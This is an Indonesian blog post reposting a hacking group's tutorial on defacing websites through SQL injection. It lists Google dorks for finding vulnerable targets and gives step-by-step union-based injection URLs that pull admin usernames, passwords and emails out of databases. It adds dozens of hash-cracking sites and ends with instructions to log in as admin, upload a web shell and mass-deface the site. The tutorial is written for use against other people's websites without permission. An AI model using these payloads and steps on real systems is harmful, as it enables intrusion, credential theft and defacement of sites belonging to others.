Wednesday, 27 July 2016

Deface dengan teknik SQL Injections by 1337cyberindo

sebelumnya makasih sama abang yg udah bikin tutorial ini ane dapetin tutorial ini dari group official 1337cyberindo
[HOT TUTORIAL/ Re POST]
Deface dengan teknik SQL Injections
Level : Basic
Tools : Hackbar & Dorker tools
Kali ini saya akan memberikan tutorial bagian pertama untuk teknik deface dengan method SQL injections level basic
harap disimak baik baik, karena saya menghabiskan waktu sekitar 3 jam utuk membuat tutorial ini,
Tutorial ini khusus untuk 1337cyberindo member, kalau mau share sertakan sumbernya...RESPECT 
berikut langkah langkahnya :
A) CARI TARGET DAN ADMIN PASSWORD
Hal pertama yang akan kita lakuan adalah mencari target dengan menggunakan "Dorks"
saya akan berikan contoh beberapa dork yang saya ambil dari google
Dork :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
kamu dapat mencarinya dengan kata kunci "Dork SQLi fresh 2016"
Langkah langkah dari perncarian admin:password ini adalah :
1). Check vulnerability atau kerentanan target
oke, kita menemukan target misal seperti ini
disini kita tinggal menambahkan kode ' (quote) dibelakan Url,untuk mengecek apakah target vulnSQLi atau tidak
dan akan menjadi seperti ini
Jika kamu menemukan error seperti :
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
atau semacam error lainnya, bisa dipastikan website tersebut rentan terhadap serangan SQL Injections
2). Mencari Jumlah kolom dalam sebuah database website
Pada tutor kali ini kita menggunakan ORDER BY
bagaimana caranya?
kita tinggal memasukan kata kunci tersebut dibelakang Url ditambahkan nomor sampai mendapatkan pesan error.
Contoh :
http://www.site.com/news.php?id=5 order by 1/* <-- lancar
http://www.site.com/news.php?id=5 order by 2/* <-- lancar
http://www.site.com/news.php?id=5 order by 3/* <-- lancar
http://www.site.com/news.php?id=5 order by 4/* <-- error
(kita mendapatkan pesan erro di kolom '4' dengan kata 'order clause' atau pesan seperti itu)
Itu artinya website terdiri dari 3 kolom / coloumns , karena kita mendapatkan error di kolom 4 , rumus 4 - 1 = 3 .
3). Check fungsi UNION
dengan union kita dapat memilih data dari suatu SQL statement
kita masukan rumus union dengan kode :
http://www.site.com/news.php?id=5 union all select 1,2,3/* (dari langkah 2 kita memiliki 3 kolom , misal vuln di kolom 2 )
http://www.site.com/news.php?id=5 union all select 1,(inject here)2,3/*
NOTE: * jika /* tidak berfungsi atau error, coba dengan --
* kamu tinggal memasukan berapa jumlah kolom dari hasil langkah kedua
4). Mengetahui MySQL version
sebelumnya kita menemukan vuln di kolom 2, mari kita check versi dari mysql nya
kita gantikan kolom 2 dengan @@version or version() dan nanti hasilnya seperti 4.1.33-log atau 5.0.45 or seperti itu pokoknya.
jadinya akan seperti ini http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
disini jika kamu mendapatkan error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
kita perlu mengkonversi fungsi>>> ()
contoh :
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
atau dengan hex() atau unhex()
sehingga menjadi
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
hehe...kamu akan mendapat MySQL version 
5). Melihat Table dan nama kolom
Oke...jika MySQL version nya < 5 (misal versi 4.1.33, 4.1.12...) <--- hal ini berbeda dengan versi MySQL 5
nanti akan kita jelakan di tahapan 5
biasanya kolom tabel ini berinisial: user/s, admin/s, member/s dan lainnya...
atau yang umum dengan nama: username, user, usr, user_name, password, pass, passwd, pwd dan lainnya...
Contoh :
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
nah, misalkan disini kita mendapatkan kolom admin di vuln langkah kedua tadi,
selanjutnya kita cari nama admin
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* ( jika kamu mendapatkan error, coba di nama kolom yang lain)
disini website akan menampilkan nama admin, misal admin atau superadmin dan lainnya...
sekarang kita check kolom password nya
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (jika kamu mendapatkan error, coba di nama kolom yang lain)
Kita melihat password di layar website dalam hast atau plain-text,itu tergantung dari bagaimana databasenya diatur
misal md5 hash, mysql hash, sha1, dll...
kita lanjutkan dengan menambahkan query , untuk itu kita menggunakan fungsi concat()
contoh :
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Kenapa menggunakan 0x3a? itu nilai hex untuk kolom
atau kita menggunakan char(58), ascii
contoh :
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
di layar, website akan menampilkan username:password , contoh, admin:admin atau admin:hash
jika kamu mendapatkan itu, kamu akan login seperti admin atau superadmin untuk hak akses website tersebut.
jika kamu tidak mendapatkannya, secara default kamu akan mendapatkan hak user
contoh:
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
6). MySQL 5
seperti yang saya katakan sebelumnya, kita akan menjelaskan bagaimana mencari table dan kolom di MySQL > 5.
untuk bagian ini kita membutuhkan information_schema. itu akan memunculkan semua tables dan columns dalam sebuah database.
untuk mengambil tables kita gunakan table_name dan information_schema.tables.
contoh :
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
disini kita mengganti kolom 2 yang vuln dengan table_name untuk mengambil table dari information_schema.tables
sekarang kita harus memasukan perintah LIMIT di akhir query untuk menampilkan semua table di database
contoh :
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
disini saya memasukan limit 0,1 itu untuk mengambil result 1 yang dimulai dari 0
sekarang untuk melihat table kedua, kita ganti limit 0,1 menjadi limit 1,1
contoh :
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
disini table kedua akan ditampilkan di layar website.
untuk table ketiga kita memasukan limit 2,1
contoh :
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
begitu seterusnya sebelum kamu menemukan nama seperti db_admin, poll_user, auth, auth_user dll
untuk mengambil nama column, kita gunakan methode yang sama
disini kita gunakan column_name dan information_schema.columns
dengan methode yang sama ini, contohnya menjadi :
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
disini kolom pertama akan ditampilkan di website
unntuk kolom kedua (kita ganti limit 0,1 menjadi limit 1,1)
contoh :
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
kolom kedua akan ditampilkan, lanjutkan seterusnya langkah tersebut yampai kamu mendapatkan kolom dengan nama seperti
username,user,login, password, pass, passwd dll
jika kamu menginginkan untuk menampilkan spesipik table gunakan query ini
misal kita ingin menemukan spesifik nama kolom untuk " user's"
contohnya :
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
sekarang kita bisa menamplkan nama kolom dari table user,
hanya dengan menggunakan LIMIT kita dapat menampilkan semua kolom dalam table user's
sekarang bagaimana cara menemukan colums user, pass dan email ?
untuk hal itu kita gunakan concat()
contohnya :
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
kita dapatkan disini user:pass:email from table users.
misal: admin:hash:mamahmuda@ngemil.com
Selanjutnya kamu dapat meng crack hash dari password tersebut di :
1-http://www.milw0rm.com
2-http://www.gdataonline.com
3-http://www.hashkiller.com
4-http://www.csthis.com
5-http://www.crysm.net
6-http://www.rednoize.com
7-http://www.md5decrypter.com
8-http://www.hashreverse.com
9-http://www.cryptobitch.de
10-http://www.hashchecker.com
11-http://www.securitystats.com
12-http://www.neeao.com
13-http://www.xpzone.de
14-http://gdataonline.com
15-http://md5.rednoize.com
16-http://md5cracker.org/
17-http://www.cmd5.com/english.aspx (457,354,352,282)
18-http://www.md5crack.com
19-http://www.hashchecker.com
20http://md5cracker(.)tk/ (MD5 Search engine by searches a total of 14 on-line crackers.)
21-http://www.md5decrypter.com (5,889,729)
22-http://www.md5oogle.com
23-http://md5-db.com (The database is approximately 70gb)
24-http://md5.rednoize.com (56,502,235)
25-http://gdataonline.com/seekhash.php (3,251,106)
26-http://www.tmto.org/?category=main&page=search_md5(306.000.000.000)
27-http://www.milw0rm.com/cracker/insert.php (Milw0rm Cracker db)
28-http://blacklight.got(hilangkan tanda kurung dns)(dot)org/cracker/crack.php (2,456,288)
29-http://www.****************l-storm.org/md5 ( The data base currently contains 169582 passwords )
30-http://md5.xpzone.de (Need Account)
31-http://passcracking.com/ (Register to increase your priority)
32-http://www.xmd5.org
33-http://gdataonline.com/seekhash.php
34-http://passcracking.com/
35-http://www.1hacker.com/md5/index.php
36-http://www.gdataonline.com/seekhash.php
37-http://www.rc.plain-text.info/
38-http://www.milw0rm.com/md5/index.php
39-http://www.cracking.com/Good_values_list.asp
40-http://www.passcracking.com/Good_values_list.asp
41-http://www.hashchecker.com/index.php?_sls=info
42-http://www.cmho(.)tk/
43-http://www.md5.rednoize.com/
44-http://www.us.md5.crysm.net/
45-http://www.milw0rm.com
46-http://www.passcracking.com/
47-http://www.hashchecker.com/
48-http://www.plain-text.info
49-http://www.md5.rednoize.com
50-http://www.ice.breaker.free.fr
51-http://www.md5.shalla.de
52-http://www.nz.md5.crysm.net
53-http://www.shm.hard-core.pl/md5/
54-http://cracker.offensive-security.com/
55-http://bokehman.com/cracker/
56-http://www.md5this.com/
57-http://hashcrack.com/index.php
58-http://tools.benramsey.com/md5/
59-http://en.wikipedia.org/wiki/MD5
60-http://md5.noisette.ch/
B) DEFACING WEBSITE
Setelah kamu mendapatkan admin:password:dan email , kamu dapat login sebagai admin website tersebut , tapi bagaimana caranya ?
ikuti langkah ini :
1) Menggunakan tools GAZA Url Scanner
Tools dapat di download di
https://www.facebook.com/gr…/1337CyberIndo/821674711300500/…
2) Upload Shell
Setelah kamu menemukan halaman login dan logging sebagai admin,sekarang waktunya upload shell lewat file manager,berikan hak akses chmod 777 .kamu bisa menggunakan shell berikut uploader nya di file group 1337cyberindo
3) Setelah shell 1337cyberindo ter upload kamu tinggal klik " mass deface " otomatis akan mendeface dengan script yang sudah tertanam didalamya atau kamu bisa upload script kamu sendiri
Demikian tutorial Deface dengan methode SQL Injections, nantikan tutorial SQLi lainnya dengan level berbeda
Regard's
Luciffer
makasih abnag atas tutorialnya 

0 comments:

Post a Comment